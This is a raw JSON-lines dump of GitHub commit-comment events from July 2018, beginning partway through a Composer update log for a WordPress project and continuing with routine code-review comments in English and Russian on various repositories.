(4.6.1)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.6)  \b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.5.3)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.5.2)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.5.1)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.5)  \b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.4.2)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.4.1)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.4.0)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.3.1)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.3.0)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.2.4)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.2.3)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.2.2)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.2.1)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.2.0)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.1.2)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.1.1)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.1.0)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.1)  \b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.0.1)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.0.0)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b                                                                    \b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (master)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b                                                                     \b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bUpdating dependencies\nPackage operations: 0 installs, 4 updates, 0 removals\n  - Updating vlucas/phpdotenv (v2.4.0 => v2.5.0): Downloading (100%)\n  - Updating wpackagist-plugin/wp-native-php-sessions (0.6.6 => 0.6.9): Downloading (100%)\n  - Updating wpackagist-theme/twentyseventeen (1.5 => 1.6): Downloading (100%)\n  - Updating pantheon-systems/wordpress-composer (4.9.5 => 4.9.7): Downloading (100%)\nWriting lock file\nGenerating optimized autoload files\n> ./scripts/composer/cleanup-composer\n+ '[' -d web/wp/wp-content/mu-plugins/ ']'\n+ rsync -a web/wp/wp-content/mu-plugins/pantheon web/wp/wp-content/mu-plugins/pantheon.php web/wp-content/mu-plugins/\n+ '[' -f web/wp/wp-config.php ']'\n+ rm web/wp/wp-config.php\n+ '[' -d web/wp/wp-content ']'\n+ rm -rf web/wp/wp-content\n> WordPressProject\\composer\\ScriptHandler::createRequiredFiles\n\n\nSymfony Security Check Report\n=============================\n\n // Checked file: /private/var/folders/46/rc22cmtx3g54h2jw6w5xj68c0000gq/T/composer-update-025a8ba/composer.lock\n\n [OK] No packages have known vulnerabilities.\n\n ! [NOTE] This checker can only detect vulnerabilities that are referenced in the SensioLabs security advisories\n !        database. Execute this command regularly to check the newly discovered vulnerabilities.\n\n```"}},"created_at":"2018-07-05T17:53:51Z"}
{"id":"7924696532","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"aisultankassenov/recipes"},"payload":{"comment":{"id":29610443,"position":20,"line":20,"path":"App.tsx","commit_id":"2ec7391c898bbb8c5bf391d0c1df35fd384899dc","created_at":"2018-07-05T17:53:52Z","updated_at":"2018-07-05T17:53:52Z","author_association":"NONE","body":"Старайся быть более постоянным в своем стиле написания кода, непонятно почему в Home ты ключ/значение на отдельную строку вывел, а в остальных местах в одну строку все записал"}},"created_at":"2018-07-05T17:53:52Z"}
{"id":"7924698374","type":"CommitCommentEvent","actor":{"login":"nmathewson"},"repo":{"name":"torproject/tor"},"payload":{"comment":{"id":29610448,"position":null,"line":null,"path":null,"commit_id":"b1de1e7a77275ad3e8a65d984ff1e9779920e933","created_at":"2018-07-05T17:54:15Z","updated_at":"2018-07-05T17:54:15Z","author_association":"CONTRIBUTOR","body":"Thanks! I've tried to fix that in 3d610363eff2fe."}},"created_at":"2018-07-05T17:54:15Z"}
{"id":"7924698574","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29610449,"position":161,"line":161,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T17:54:17Z","updated_at":"2018-07-05T17:54:17Z","author_association":"NONE","body":"count and record unrecognised fie extensions"}},"created_at":"2018-07-05T17:54:17Z"}
{"id":"7924699044","type":"CommitCommentEvent","actor":{"login":"andreihaidu"},"repo":{"name":"robcog-iai/UUtils"},"payload":{"comment":{"id":29610451,"position":28,"line":218,"path":"Source/UConversions/Public/Conversions.h","commit_id":"f9c5a537860723f2c30a12c7ccde714a362d033e","created_at":"2018-07-05T17:54:24Z","updated_at":"2018-07-05T17:54:24Z","author_association":"MEMBER","body":"ROSCameraToU is a placeholder, the values are not correct, if you find out the values please do a PR :) I only used UToROS and ROSToU"}},"created_at":"2018-07-05T17:54:24Z"}
{"id":"7924700005","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"thomaspark/bootswatch"},"payload":{"comment":{"id":29610454,"position":null,"line":null,"path":null,"commit_id":"516548edc83838830b9015126b24cda47ed9dbac","created_at":"2018-07-05T17:54:36Z","updated_at":"2018-07-05T17:54:36Z","author_association":"CONTRIBUTOR","body":"@thomaspark: you need any help?"}},"created_at":"2018-07-05T17:54:36Z"}
{"id":"7924701778","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"aisultankassenov/recipes"},"payload":{"comment":{"id":29610458,"position":25,"line":25,"path":"App.tsx","commit_id":"2ec7391c898bbb8c5bf391d0c1df35fd384899dc","created_at":"2018-07-05T17:54:59Z","updated_at":"2018-07-05T17:54:59Z","author_association":"NONE","body":"Этот View тебе здесь не нужен"}},"created_at":"2018-07-05T17:54:59Z"}
{"id":"7924705596","type":"CommitCommentEvent","actor":{"login":"rsasch"},"repo":{"name":"DataBiosphere/job-manager"},"payload":{"comment":{"id":29610464,"position":null,"line":null,"path":null,"commit_id":"e11291b7420ca5f90215c1ff49367f8dbed887e2","created_at":"2018-07-05T17:55:45Z","updated_at":"2018-07-05T17:55:45Z","author_association":"CONTRIBUTOR","body":"clearer – thanks!"}},"created_at":"2018-07-05T17:55:45Z"}
{"id":"7924706554","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29610466,"position":null,"line":null,"path":null,"commit_id":"fcd0de7353cd66c9de794f43bcb4cea9473436b5","created_at":"2018-07-05T17:55:57Z","updated_at":"2018-07-05T17:55:57Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2307 of 2307 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fcd0de7353cd66c9de794f43bcb4cea9473436b5-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fcd0de7353cd66c9de794f43bcb4cea9473436b5-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-05T17:55:57Z"}
{"id":"7924706669","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29610467,"position":182,"line":182,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T17:55:58Z","updated_at":"2018-07-05T17:55:58Z","author_association":"NONE","body":"Warning, this also suggests an error occurred during download that should have been caught and checked at that time"}},"created_at":"2018-07-05T17:55:58Z"}
{"id":"7924709219","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29610476,"position":193,"line":193,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T17:56:30Z","updated_at":"2018-07-05T17:56:30Z","author_association":"NONE","body":"not rather than is False"}},"created_at":"2018-07-05T17:56:30Z"}
{"id":"7924709722","type":"CommitCommentEvent","actor":{"login":"MacOSO"},"repo":{"name":"blurtech/event-sharing-backend"},"payload":{"comment":{"id":29610481,"position":null,"line":null,"path":null,"commit_id":"1617078d5e6826a22a70b40ae82afe8e0fd00ade","created_at":"2018-07-05T17:56:36Z","updated_at":"2018-07-05T17:56:36Z","author_association":"MEMBER","body":"Fix for #2 issue"}},"created_at":"2018-07-05T17:56:36Z"}
{"id":"7924710259","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"aisultankassenov/recipes"},"payload":{"comment":{"id":29610482,"position":40,"line":40,"path":"components/AddRecipeScreen.tsx","commit_id":"2ec7391c898bbb8c5bf391d0c1df35fd384899dc","created_at":"2018-07-05T17:56:43Z","updated_at":"2018-07-05T17:56:43Z","author_association":"NONE","body":"массивы по другому пишутся, либо так: Array<string>, либо так: string[].\r\nhttps://www.typescriptlang.org/docs/handbook/basic-types.html\r\n\r\n"}},"created_at":"2018-07-05T17:56:43Z"}
{"id":"7924710278","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29610483,"position":207,"line":207,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T17:56:43Z","updated_at":"2018-07-05T17:56:43Z","author_association":"NONE","body":"Exception too broad"}},"created_at":"2018-07-05T17:56:43Z"}
{"id":"7924710745","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29610484,"position":208,"line":208,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T17:56:49Z","updated_at":"2018-07-05T17:56:49Z","author_association":"NONE","body":"warning"}},"created_at":"2018-07-05T17:56:49Z"}
{"id":"7924711394","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29610487,"position":null,"line":null,"path":null,"commit_id":"d4666d1e51a11f92614c18da806533175ee6a377","created_at":"2018-07-05T17:56:58Z","updated_at":"2018-07-05T17:56:58Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1681 of 1681 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4666d1e51a11f92614c18da806533175ee6a377-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4666d1e51a11f92614c18da806533175ee6a377-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4666d1e51a11f92614c18da806533175ee6a377-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.17%25-green.png)</a>\n"}},"created_at":"2018-07-05T17:56:58Z"}
{"id":"7924712235","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"aisultankassenov/recipes"},"payload":{"comment":{"id":29610489,"position":46,"line":46,"path":"components/AddRecipeScreen.tsx","commit_id":"2ec7391c898bbb8c5bf391d0c1df35fd384899dc","created_at":"2018-07-05T17:57:09Z","updated_at":"2018-07-05T17:57:09Z","author_association":"NONE","body":"Первый аргумент это Props, потом State. Ты не увидел ошибок в редакторе?"}},"created_at":"2018-07-05T17:57:09Z"}
{"id":"7924712395","type":"CommitCommentEvent","actor":{"login":"reneeotten"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29610490,"position":1,"line":1,"path":"python/py-nose/files/nosetests37","commit_id":"142d000586d1520e70af59ff39b2d5f4e0de3bae","created_at":"2018-07-05T17:57:10Z","updated_at":"2018-07-05T17:57:10Z","author_association":"CONTRIBUTOR","body":"this should be ```bin/nosetests-3.7```"}},"created_at":"2018-07-05T17:57:10Z"}
{"id":"7924713013","type":"CommitCommentEvent","actor":{"login":"garyskeete"},"repo":{"name":"garyskeete/linux-modder.github.io"},"payload":{"comment":{"id":29610493,"position":null,"line":null,"path":null,"commit_id":"3bb4a21ca161c61c68702d47bc5c236f7076681c","created_at":"2018-07-05T17:57:18Z","updated_at":"2018-07-05T17:57:18Z","author_association":"OWNER","body":"Photonics laser engine search engine also rocket propulsion. The rocket will link with various starlight capabilities internally magnify the power of the sun also and shoot off into space attaining velocity of tremendous speed. The  search engine would be laser blast driven"}},"created_at":"2018-07-05T17:57:18Z"}
{"id":"7924714009","type":"CommitCommentEvent","actor":{"login":"martinbro"},"repo":{"name":"martinbro/pwa-stroem-trekant"},"payload":{"comment":{"id":29610497,"position":null,"line":null,"path":null,"commit_id":"b9878c7104d7ca06d77404e4c3cf0320a58d5505","created_at":"2018-07-05T17:57:30Z","updated_at":"2018-07-05T17:57:30Z","author_association":"OWNER","body":"Hmm nu er der skiftet tema - men hvor er det?"}},"created_at":"2018-07-05T17:57:30Z"}
{"id":"7924716072","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29610503,"position":null,"line":null,"path":null,"commit_id":"49c0eb6682d3ca620e1125b0085e25727d1c27a2","created_at":"2018-07-05T17:57:57Z","updated_at":"2018-07-05T17:57:57Z","author_association":"NONE","body":"я бы подытожил уже третью прорвку примерно так\r\nплюсы:\r\n- ты убрал методы инпута/аутпута из классов \r\n- разбил часть методов на более понятные и правильные\r\n\r\nминусы\r\n- код все еще мало похож на структурированное ООП приложение\r\n- куча модулей, которые ты написал существуют в основном для того, чтобы скрывать, что на самом деле логичной ООП структуры у приложения нет, взаимодействие классов через объекты слабенкое\r\n"}},"created_at":"2018-07-05T17:57:57Z"}
{"id":"7924717543","type":"CommitCommentEvent","actor":{"login":"xgfs"},"repo":{"name":"Baschdl/node2vec-c"},"payload":{"comment":{"id":29610506,"position":null,"line":null,"path":null,"commit_id":"67868d9b519230ec64190e4314a49c494a0fd462","created_at":"2018-07-05T17:58:17Z","updated_at":"2018-07-05T17:58:17Z","author_association":"NONE","body":"derp. Could you PR into main branch?"}},"created_at":"2018-07-05T17:58:17Z"}
{"id":"7924720033","type":"CommitCommentEvent","actor":{"login":"jernejsk"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29610513,"position":null,"line":null,"path":null,"commit_id":"1a417819cb22d515a20bc5ba42da2ac36d14f405","created_at":"2018-07-05T17:58:50Z","updated_at":"2018-07-05T17:58:50Z","author_association":"CONTRIBUTOR","body":"I did number of such changes without testing (copy & pasting display nodes). However, testing should be done if possible."}},"created_at":"2018-07-05T17:58:50Z"}
{"id":"7924720821","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29610515,"position":null,"line":null,"path":null,"commit_id":"49c0eb6682d3ca620e1125b0085e25727d1c27a2","created_at":"2018-07-05T17:59:00Z","updated_at":"2018-07-05T17:59:00Z","author_association":"NONE","body":"счету структура должна быть примерно следующая:\r\n1. **файл запускающий программу** (\"мэйн\" или \"старт\" к примеру)\r\n    - в этом файле логики нет вообще\r\n    - в нем есть \"реквайер\" всех остальных необходимых файлов\r\n    - в нем создается объект класса Интерфейс\r\n    - затем создается объект контроллера (см. пункт 2)\r\n      можно назвать по другому, по сути это класс, который управляет рантаймом программы, направляет ход ее выполения в зависимости от вводов пользователя и результатов работы самого приложения\r\n      когда происходит  инстанциация этого класса (к примеру Гейм, Казино, Тейбл),  который будет \"вести игру\", то ему в качестве аргумента передается объект интерфейса\r\n2. **класс КОНТРОЛЛЕР**, т.е. класс \"несущий поток исполнения программы\"... его функции:\r\n    - вызывать методы интерфейса для общения с игроком\r\n    - вызывать методы других классов (на объектах этих классов), которые будут содержать состояние сущностей программы (Игрок, Дилер, Колода и т.д.)\r\n    - возможно создавать другие контроллеры и вызывать методы этих других контроллеров (если ты решишь выделить часть \"потока выполнения приложения\" в отдельный \"подпоток\" (\"подпотоки\")\r\n    - возможно вызывать методы классов или модулей, в которых будут содержаться \"правила\" или \"логика\", ну к примеру из контроллера в такие классы (модули) можно вынести методы ведущие рассчет очков, определение победителя и т.п... здесь идея заключается в том, что если эти методы собрать в одном месте, то поменять их будет легко и просто (ну например вместо игры до 21 сделать игру до 23), при этом никиких вмешательств в другие части программы не понадобится\r\n3. **ИНТЕРФЕЙС** дожен быть полностью вынесен из всех классов!!!\r\n    - лучше всего реализовать это с помощью отдельного класса, к примеру `class Interface` (возможно нескольких классов)\r\n    - все методы \"общения с пользователем\" (вывод и ввод) должны быть только в этом классе\r\n    - вызов методов интерфейса должен происходить ТОЛЬКО ИЗ класса (классов) КОНТРОЛЛЕРА (методы вызываться на инстансе класса `Interface`)\r\n    - интерфейс не должен ничего знать о приложении вообще, он не должен хранить переменные приложение (только свои служебные), он не должен знать о классах и методах приложения\r\n\r\n    **главный плюс такого подхода** и одновременно ориентир, для правильного понимания того, как нужно писать интерфейс и его взаимодействие с контроллером:\r\n    *вместо интерфейса командной строки можно в любой момент написать другой интерфейс, который будет к примеру работать не в командной строке, а отправлять запросы посредством  http протокола... (лишь бы названия методов, т.е. интерфейс класса совпадал), а  логика должна спокойно продолжить работу не обращая внимания на смену интерфейса...*\r\n4. **классы хранящие состояния сущностей приложения**... Игрок, Дилер, Колода... может быть что-то добавишь, может быть убавишь... основная функция этих классов должна быть в хранении состояния, т.е. объекты этих классов должны хранить аттрибуты, уметь их возвращать, если нужно - вычислять какие-то значения на основе своих аттрибутов (ну и должны принимать значения этих аттрибутов, либо в момент инициализации, либо в течении жизни объектов, посредством методов соотвествующих классов)"}},"created_at":"2018-07-05T17:59:00Z"}
{"id":"7924723395","type":"CommitCommentEvent","actor":{"login":"Florent5"},"repo":{"name":"hugo06830/JDB"},"payload":{"comment":{"id":29610527,"position":null,"line":null,"path":null,"commit_id":"fb387159723f5083ea12cab2b7138ec3f12dc17f","created_at":"2018-07-05T17:59:33Z","updated_at":"2018-07-05T17:59:33Z","author_association":"COLLABORATOR","body":"voila\r\n"}},"created_at":"2018-07-05T17:59:33Z"}
{"id":"7924726962","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"aisultankassenov/recipes"},"payload":{"comment":{"id":29610550,"position":94,"line":94,"path":"components/AddRecipeScreen.tsx","commit_id":"2ec7391c898bbb8c5bf391d0c1df35fd384899dc","created_at":"2018-07-05T18:00:19Z","updated_at":"2018-07-05T18:00:19Z","author_association":"NONE","body":"Если ставишь access modifier-ы на функции, ставь их везде.\r\n\r\nВ React.Component public должны быть:\r\nstate\r\nconstructor\r\nвсе lifecycle methods\r\nrender\r\n\r\nвсе остальное можно делать private"}},"created_at":"2018-07-05T18:00:19Z"}
{"id":"7924729512","type":"CommitCommentEvent","actor":{"login":"zesu00"},"repo":{"name":"zesu00/hello-world"},"payload":{"comment":{"id":29610559,"position":null,"line":null,"path":null,"commit_id":"237a0fed74c989156ece63973edf1c1b2bf4cbad","created_at":"2018-07-05T18:00:49Z","updated_at":"2018-07-05T18:00:49Z","author_association":"OWNER","body":"Kya hua\n\nOn Thu 5 Jul, 2018, 10:15 PM Kinnari-Sharma, <notifications@github.com>\nwrote:\n\n> Really?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/zesu00/hello-world/commit/237a0fed74c989156ece63973edf1c1b2bf4cbad#commitcomment-29609517>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATnrWoLcK7yIDhtRxWaaq6tMtApP7Z5vks5uDkKrgaJpZM4VENoW>\n> .\n>\n"}},"created_at":"2018-07-05T18:00:49Z"}
{"id":"7924732423","type":"CommitCommentEvent","actor":{"login":"mintty"},"repo":{"name":"mintty/mintty"},"payload":{"comment":{"id":29610570,"position":null,"line":null,"path":null,"commit_id":"c84b1c0f379e84f7388a841d3f3ebafa3ff660f4","created_at":"2018-07-05T18:01:26Z","updated_at":"2018-07-05T18:01:26Z","author_association":"OWNER","body":"None, it's only a style thing. I'm ever again confused by this insane C notation."}},"created_at":"2018-07-05T18:01:26Z"}
{"id":"7924732573","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"aisultankassenov/recipes"},"payload":{"comment":{"id":29610572,"position":99,"line":99,"path":"components/AddRecipeScreen.tsx","commit_id":"2ec7391c898bbb8c5bf391d0c1df35fd384899dc","created_at":"2018-07-05T18:01:28Z","updated_at":"2018-07-05T18:01:28Z","author_association":"NONE","body":"Старайся все стили прописывать через StyleSheet.create.\r\n\r\nhttps://stackoverflow.com/a/42511138/2925604"}},"created_at":"2018-07-05T18:01:28Z"}
{"id":"7924734189","type":"CommitCommentEvent","actor":{"login":"Pikachu920"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29610576,"position":78,"line":78,"path":"src/main/java/ch/njol/skript/effects/EffSendBlockChange.java","commit_id":"ab391c37417bba1d4044d89f957f7351b314acb1","created_at":"2018-07-05T18:01:47Z","updated_at":"2018-07-05T18:01:47Z","author_association":"MEMBER","body":"its fine on one line here because it doesn't reach the char limit"}},"created_at":"2018-07-05T18:01:47Z"}
{"id":"7924737676","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29610582,"position":null,"line":null,"path":null,"commit_id":"207158531e97fac46cfaa6a46c66601e4b30fbf9","created_at":"2018-07-05T18:02:33Z","updated_at":"2018-07-05T18:02:33Z","author_association":"COLLABORATOR","body":"Just realized this isn't a defined data definition in the glassbr example: it is just a `QDefinition` that is seen in the \"Values of Auxiliary Constants Section\". Will revert these changes, although this caused me to recognize that there are `QDefinition`s present that aren't used as DataDefinitions. Since we want to avoid using raw `QDefinition`s (#747), what will be done to these instances? @JacquesCarette "}},"created_at":"2018-07-05T18:02:33Z"}
{"id":"7924738634","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29610586,"position":null,"line":null,"path":null,"commit_id":"49c0eb6682d3ca620e1125b0085e25727d1c27a2","created_at":"2018-07-05T18:02:45Z","updated_at":"2018-07-05T18:02:45Z","author_association":"NONE","body":"попробовал поиграть\r\n```\r\nDo you want to continue? y/n\r\ny\r\nYour cards:\r\nA♧\r\n6♦\r\nYour points: 17\r\n\r\n    Dealer cards:\r\n    1.**\r\n    2.**\r\n   \r\n\r\n    1. Skip\r\n    2. Take card\r\n    3. Open cards\r\n    \r\n2\r\nYour cards:\r\nA♧\r\n6♦\r\n9♥\r\nYour points: 26\r\n```\r\nправильный рассчет должен вернуть 16 очков, а не 26"}},"created_at":"2018-07-05T18:02:45Z"}
